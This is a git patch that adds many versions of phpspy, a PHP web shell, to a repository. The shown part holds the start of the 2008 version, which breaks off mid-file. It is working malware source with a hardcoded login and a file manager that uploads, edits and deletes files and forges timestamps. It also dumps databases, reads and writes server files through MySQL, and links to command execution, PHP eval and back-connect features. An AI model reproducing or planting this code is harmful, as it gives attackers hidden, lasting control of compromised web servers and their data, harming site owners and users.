From c84c49a723ea71a4321cceb6cacd4eb9d8383bc4 Mon Sep 17 00:00:00 2001
From: tennc <tennc@126.com>
Date: Thu, 23 May 2013 18:16:33 +0800
Subject: [PATCH] update phpspy

---
 php/phpspy/2008.php             | 1990 ++++++++++++++++++++++
 php/phpspy/2009lite.php         | 1165 +++++++++++++
 php/phpspy/2009mssql.php        | 2723 +++++++++++++++++++++++++++++++
 php/phpspy/2011.php             | 2141 ++++++++++++++++++++++++
 php/phpspy/2013加密.php         |    7 +
 php/phpspy/2013未加密.php       | 1616 ++++++++++++++++++
 php/phpspy/phpspy2010.php       |   21 +
 php/phpspy/phpspy_2005_full.php | 1211 ++++++++++++++
 php/phpspy/phpspy_2005_lite.php |  659 ++++++++
 php/phpspy/phpspy_2006.php      | 1309 +++++++++++++++
 10 files changed, 12842 insertions(+)
 create mode 100644 php/phpspy/2008.php
 create mode 100644 php/phpspy/2009lite.php
 create mode 100644 php/phpspy/2009mssql.php
 create mode 100644 php/phpspy/2011.php
 create mode 100644 php/phpspy/2013加密.php
 create mode 100644 php/phpspy/2013未加密.php
 create mode 100644 php/phpspy/phpspy2010.php
 create mode 100644 php/phpspy/phpspy_2005_full.php
 create mode 100644 php/phpspy/phpspy_2005_lite.php
 create mode 100644 php/phpspy/phpspy_2006.php

diff --git a/php/phpspy/2008.php b/php/phpspy/2008.php
new file mode 100644
index 0000000..9e68fe1
--- /dev/null
+++ b/php/phpspy/2008.php
@@ -0,0 +1,1990 @@
+<?php
+
+/*****************************************************************************
+
+===================== ÇëÎóÓÃÓÚ·Ç·¨ÓÃ;£¬Ôì³ÉÒ»Çкó¹ûÓë±¾ÈËÎ޹ء£====================
+
+·¢²¼´Ë°æ±¾ÊÇΪÁ˼ÍÄȫÌìʹÔø¾­µÄ»Ô»Í¡£
+
+¸ÐлÄãÃÇÓëÎÒһͬ×ß¹ý£ºSniper\Super¡¤Hei\kEvin1986\saiy\wofeiwo¡£
+
+¸ÐлËùÓеÄÅóÓÑÃÇ¡¢ÐÖµÜÃÇ¡£¶àлÄãÃǵĹØÐĺÍÖ§³Ö£¡
+
+Ñ¡ÔñÔÚ1ÔÂ7ÈÕ·¢²¼ÊÇΪÁ˼ÍÄîÎÒÀÏÆŵÄÉúÈÕ£¬Ô¤×£ÎÒÔÚ±¾ÃüÄêÀï¡£ÏÌÓã·­Éí£¡
+
+====================== ×îºóԤף°²È«ÌìʹµÄÿһλÅóÓÑ·É»ÆÌÚ´ï =======================
+
+Codz by angel(4ngel)
+
+Make in China
+
+Web: http://www.4ngel.net
+
+*****************************************************************************/
+
+error_reporting(7);
+@set_magic_quotes_runtime(0);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
+//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
+define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
+define('IS_COM', class_exists('COM') ? 1 : 0 );
+define('IS_GPC', get_magic_quotes_gpc());
+$dis_func = get_cfg_var('disable_functions');
+define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
+@set_time_limit(0);
+
+foreach(array('_GET','_POST') as $_request) {
+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+
+/*===================== ³ÌÐòÅäÖà =====================*/
+$admin = array();
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤, true ΪÐèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check'] = true;
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']  = 'angel';
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$admin['cookiepre'] = '';
+// cookie ×÷ÓÃÓò
+$admin['cookiedomain'] = '';
+// cookie ×÷Ó÷¾¶
+$admin['cookiepath'] = '/';
+// cookie ÓÐЧÆÚ
+$admin['cookielife'] = 86400;
+/*===================== ÅäÖýáÊø =====================*/
+
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if ($action == "logout") {
+	scookie('phpspypass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == $password) {
+			scookie('phpspypass', $password);
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
+	}
+	if ($_COOKIE['phpspypass']) {
+		if ($_COOKIE['phpspypass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+$errmsg = '';
+
+// ²é¿´PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// ÏÂÔØÎļþ
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
+if ($doing == 'backupmysql' && !$saveasfile) {
+	dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+	$table = array_flip($table);
+	$result = q("SHOW tables");
+	if (!$result) p('<h2>'.mysql_error().'</h2>');
+	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata .= sqldumptable($currow[0]);
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// ͨ¹ýMYSQLÏÂÔØÎļþ
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2008</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:goaction('logout');">Logout</a> | 
+			<a href="javascript:goaction('file');">File Manager</a> | 
+			<a href="javascript:goaction('sqladmin');">MySQL Manager</a> | 
+			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> | 
+			<a href="javascript:goaction('shell');">Execute Command</a> | 
+			<a href="javascript:goaction('phpenv');">PHP Variable</a> | 
+			<a href="javascript:goaction('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// »ñÈ¡µ±Ç°Â·¾¶
+!$dir && $dir = '.';
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// Åж϶ÁдÇé¿ö
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ɾ³ýĿ¼
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ´´½¨Ä¿Â¼
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// ÉÏ´«Îļþ
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// ±à¼­Îļþ
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// ±à¼­ÎļþÊôÐÔ
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ¸ÄÃû
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// ¸´ÖÆÎļþ
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ¿Ë¡ʱ¼ä
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ×Ô¶¨Òåʱ¼ä
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ´ò°üÏÂÔØ
+	elseif($doing == 'downrar') {
+		if ($dl) {
+			$dfiles='';
+			foreach ($dl as $filepath => $value) {
+				$dfiles.=$filepath.',';
+			}
+			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+			$dl=explode(',',$dfiles);
+			$zip=new PHPZip($dl);
+			$code=$zip->out;
+			header('Content-type: application/octet-stream');
+			header('Accept-Ranges: bytes');
+			header('Accept-Length: '.strlen($code));
+			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
+			echo $code;
+			exit;
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	// ÅúÁ¿É¾³ýÎļþ
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//²Ù×÷Íê±Ï
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=1;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+</script>
+  <?php
+	tbhead();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
+	p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	if ($view_writable) {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	} else {
+		p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
+	}
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('</td></tr></form>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//²é¿´ËùÓпÉдÎļþºÍĿ¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable) {
+		$dirdata = GetList($nowpath);
+	} else {
+		// Ŀ¼Áбí
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>--</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'sqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$table = array_flip($table);
